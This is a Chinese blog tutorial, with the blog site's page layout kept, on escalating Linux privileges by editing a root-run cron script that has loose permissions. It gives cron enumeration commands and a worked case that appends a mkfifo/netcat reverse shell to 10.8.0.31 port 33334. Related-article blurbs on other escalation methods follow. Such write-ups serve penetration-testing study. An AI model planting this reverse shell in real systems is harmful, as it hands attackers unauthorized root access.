计划任务提权

已于 2024-09-22 11:56:00 修改
阅读量212 收藏 5
点赞数 7
分类专栏: Linux提权 文章标签: linux 运维 服务器
于 2024-09-21 17:55:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68636078/article/details/142412078
版权

本质:

如果可以找到可以有权限修改的计划任务脚本(该脚本以root权限运行),就可以修改脚本实现提权。本质上,就是文件权限配置不当。

用法:

查找计划任务是否有root运行的脚本,且可修改的脚本, -> 在脚本中添加需要执行的命令

1、查看计划任务,找到有修改权限的计划任务脚本

ls -l /etc/cron*
cat /etc/crontab

 2、发现存在一个root身份运行的脚本文件,去相应的目录下查看一下这个计划任务运行的文件,看其是否可以被修改

3、如果是,则可以修改文件,使其反弹一个shell就可以提权成功

案例:

1、查看定任务

cat /etc/crontab

发现有脚本,但是指向的另一个文件

2、写入反弹shell

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.0.31 33334 >/tmp/f' >> write.sh
<|sh -i 2>&1|nc 10.8.0.31 33334 >/tmp/f' >> write.sh

可乐葡萄糖
关注
专栏目录
使用计划任务提权到SYSTEM用户
11-17
标题中的“使用计划任务提权到SYSTEM用户”指的是在Windows操作系统中,利用系统自带的计划任务功能提升权限至SYSTEM级别。SYSTEM用户是Windows系统中拥有极高权限的内置账户,它可以访问系统的所有资源,通常用于...
LINUX提权计划任务提权
小王的储物间
12-14 973
总结一下本文的知识点,讲了计划任务提权常用的两种方法以及漏洞探针的安装及使用,有兴趣的小伙伴可以自己尝试去搭建靶机提权,如果喜欢本文不妨一键三连。
Crond计划任务和用户权限提升
l187567的博客
08-14 814
计划任务是在指定的时间间隔内自动执行的任务。在Linux系统中,常用的计划任务工具是crond(cron daemon)。用户可以通过创建cron job(计划任务)来定期执行指定的命令或脚本。用户权限提升是指在执行某些需要超级用户权限(root权限)才能进行的操作时,普通用户通过使用sudo命令来获得临时的超级用户权限。总体来说,Crond计划任务和用户权限提升是Linux系统中非常有用的功能。
操作系统权限提升(二十)之Linux提权-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1099
先准备一个SUID文件或者权限为xx7的文件,让低权限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务提权是因为权限配置不当,计划任务以root权限运行,低权限的用户可以修改计划任务的文件,从而被攻击者利用,导致提权Linux计划任务命令如下。linux文件权第一部分是该文件的拥有者所拥有的权限,第二部分是该文件所在用户组的用户所拥有的权限,最后一部分是其他用户所拥有的权限。
操作系统权限提升(十)之系统错误配置-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 612
计划任务提权的原理非常的简单,就是在设置计划任务的时候配置不当,导致我们可以更改计划任务执行的文件,我们可以进行劫持然后替换成自己的恶意文件达到提权的目的
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
NSudo提权工具最新版
07-24
1. 只为必要任务提权:避免无理由地提升权限,仅在确实需要执行高级操作时使用。 2. 安全来源:确保从官方网站或其他可信赖的渠道下载NSudo,防止下载恶意篡改的版本。 3. 后果意识:提权可能导致系统不稳定或数据...
Linux提权手法总结以及 Linux提权exp集合
02-22
定时任务提权则依赖于cron或at等系统调度工具。攻击者可能通过篡改或注入定时任务来执行恶意脚本。因此,定期检查`crontab`配置,限制非管理员用户的定时任务权限,是非常重要的安全措施。 sudo提权是攻击者利用...
sudo提权和普通用户免密切换到root详细笔记
07-02
通过这种方式,普通用户`shi`可以方便地在执行需要root权限的任务时进行提权,而无需记住root用户的密码,提高了工作效率。然而,这种配置应当谨慎使用,因为它极大地降低了系统的安全性。如果`shi`用户的账户被恶意...
windows&linux;提权总结
04-24
- 熟悉权限提升的常见方法,包括Windows中的UAC绕过、服务配置错误、计划任务等。 - 对Linux系统中SUID/SGID位的滥用、内核漏洞、配置文件错误等技术的掌握。 需要注意的是,这些信息和方法不应被用于非法目的。在...
windows7提权
04-26
提权虽然方便,但也有安全隐患,因为恶意软件可能会利用提权漏洞。因此,只在必要时提升权限,并确保来源可靠的程序在管理员模式下运行。同时,定期更新系统和软件,以防止利用已知漏洞进行提权的攻击。 总结来说,...
星外提权脚本
10-24
1. **系统管理与维护**:通过提权操作,管理员能够执行一些仅限于高级权限才能完成的任务,如安装软件、修改系统配置等。 2. **安全测试与评估**:在网络安全领域,提权脚本可用于渗透测试,帮助安全专家发现系统中...
linux提权代码
06-04
Linux系统中,“提权”是指提升用户权限的过程,通常从普通用户权限升级到管理员(root)权限。这是因为Linux是一个多用户、多任务的操作系统,为了安全考虑,它对不同用户的权限进行了严格的划分。提权在系统管理...
没有Wscript.shell组件提权.txt
07-18
### 没有Wscript.shell组件的提权技术解析 #### 标题解析 标题“没有Wscript.shell组件提权.txt”明确指出了一种在不依赖`Wscript.shell`组件的情况下进行权限提升的方法。通常情况下,`Wscript.shell`是Windows...
【Web】超级详细的Linux权限提升一站式笔记
最新发布
uuzeray的博客
02-11 2392
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的注意以下几点:1. 只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.2. 命令执行者要对该程序文件拥有执行(x)权限.
计划任务提权crontab提权
nvhack的专栏
01-19 342
此段内容为不断监听12345端口,并等待其他机器链接,并执行传递的命令。文件已经创建成功,因为是root权限执行,当前目录直接在root目录。等待目标执行后,我们启动客户端 client.py。我们修改/etc/crontab 添加一行内容。利用系统 会周期性的去执行特定的指令来提权。我们替换nanhack.py 为其他内容。nanhack.py 代码如下。
linux计划任务提权
09-22
Linux计划任务提权是一种利用权限配置不当的计划任务来提升权限的方法。当某个计划任务以root身份运行,并且可以被低权限用户编辑时,攻击者可以修改计划任务的文件,从而实现提权。具体步骤如下: 1. 使用命令`crontab -e`编辑计划任务文件。 2. 找到以root权限运行的计划任务,并确认可以被低权限用户编辑。 3. 修改计划任务的内容,使其执行攻击者指定的命令或脚本。 4. 保存并退出计划任务文件。 请注意,计划任务提权的成功与否还取决于系统的安全配置,如权限限制等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值